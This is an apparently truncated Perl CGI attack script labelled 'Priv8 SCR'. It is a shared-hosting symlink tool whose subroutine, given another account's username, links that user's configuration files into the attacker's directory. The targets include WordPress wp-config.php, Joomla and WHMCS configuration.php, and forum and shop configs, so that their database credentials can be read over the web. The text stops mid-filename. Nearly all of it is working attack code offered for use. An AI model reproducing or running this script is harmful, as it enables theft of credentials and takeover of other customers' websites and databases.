#!/usr/bin/perl -I/usr/local/bandmin
print "Content-type: text/html\n\n";
print'
Priv8 SCR
';
sub lil{
($user) = @_;
$msr = qx{pwd};
$kola=$msr."/".$user;
$kola=~s/\n//g;
symlink('/home/'.$user.'/public_html/beta/configuration.php',$kola.'-joomla.txt') ;
symlink('/home/'.$user.'/public_html/configuration.php',$kola.'-joomla.txt') ;
symlink('/home/'.$user.'/public_html/home/configuration.php',$kola.'-joomla - home.txt') ;
symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'-wordpress.txt') ;
symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'-wordpress.txt') ;
symlink('/home/'.$user.'/public_html/web/wp-config.php',$kola.'-wordpress - web.txt') ;
symlink('/home/'.$user.'/public_html/SSI.php',$kola.'- C M F .txt') ;
symlink('/home/'.$user.'/public_html/forum/SSI.php',$kola.'- C M F - forum.txt') ;
symlink('/home/'.$user.'/public_html/inc/config.php',$kola.'- MyBB.txt') ;
symlink('/home/'.$user.'/public_html/forum/inc/config.php',$kola.'- MyBB - forum.txt') ;
symlink('/home/'.$user.'/public_html/config.php',$kola.'- Other.txt') ;
symlink('/home/'.$user.'/public_html/lib/config.php',$kola.'- Balitbang.txt') ;
symlink('/home/'.$user.'/public_html/client/configuration.php',$kola.'-clients.txt') ;
symlink('/home/'.$user.'/public_html/clients/configuration.php',$kola.'-client.txt') ;
symlink('/home/'.$user.'/public_html/billing/configuration.php',$kola.'-billing.txt') ;
symlink('/home/'.$user.'/public_html/billings/configuration.php',$kola.'-billings.txt') ;
symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$kola.'- whmcs - whmcs.txt') ;
symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.'- whm - whm.txt');
symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'- VBulletin - forum.txt');
symlink('/home/'.$user.'/public_html/forum/config.php',$kola.' - PhpBB - forum.txt') ;
symlink('/home/'.$user.'/public_html/whmc/configuration.php',$kola.'- whmc - whmc.txt');
symlink('/home/'.$user.'/public_html/submitticket.php',$kola.' - whmcs2.txt');
symlink('/home/'.$user.'/public_html/manage/configuration.php',$kola.' -mangewhmcs.txt');
symlink('/home/'.$user.'/public_html/myshop/configuration.php',$kola.' -myshop.txt');
symlink('/home/'.$user.'/public_html/support/configuration.php',$kola.'-support.txt');
symlink('/home/'.$user.'/public_html/supports/configuration.php',$kola.'-supports.txt');
symlink('/home/'.$user.'/public_html/oscommerce/includes/configure.php',$kola.'-oscommerce.txt');
symlink('/home/'.$user.'/public_html/oscommerces/includes/configure.php',$kola.'-oscommerces.txt');
symlink('/home/'.$user.'/public_html/shopping/includes/configure.php',$kola.'-shop-shopping.txt');
symlink('/home/'.$user.'/public_html/sale/includes/configure.php',$kola.'-sale.txt');
symlink('/home/'.$user.'/public_html/amember/config.inc.php',$kola.'-amember.txt');
symlink('/home/'.$user.'/public_html/config.inc.php',$kola.'-amember2.txt');
symlink('/home/'.$user.'/public_html/wp/wp-config.php',$kola.'- wordpress - wp.txt');
symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$kola.'- wwordpress - wp - beta.txt');
symlink('/home/'.$user.'/public_html/beta/wp-config.php',$kola.'- wordpress - beta.txt');
symlink('/home/'.$user.'/public_html/press/wp-config.php',$kola.'-wp13-press.txt');
symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$kola.'- wordpress -wordpress.txt');
symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$kola.'- wordpress - wordpress-beta.t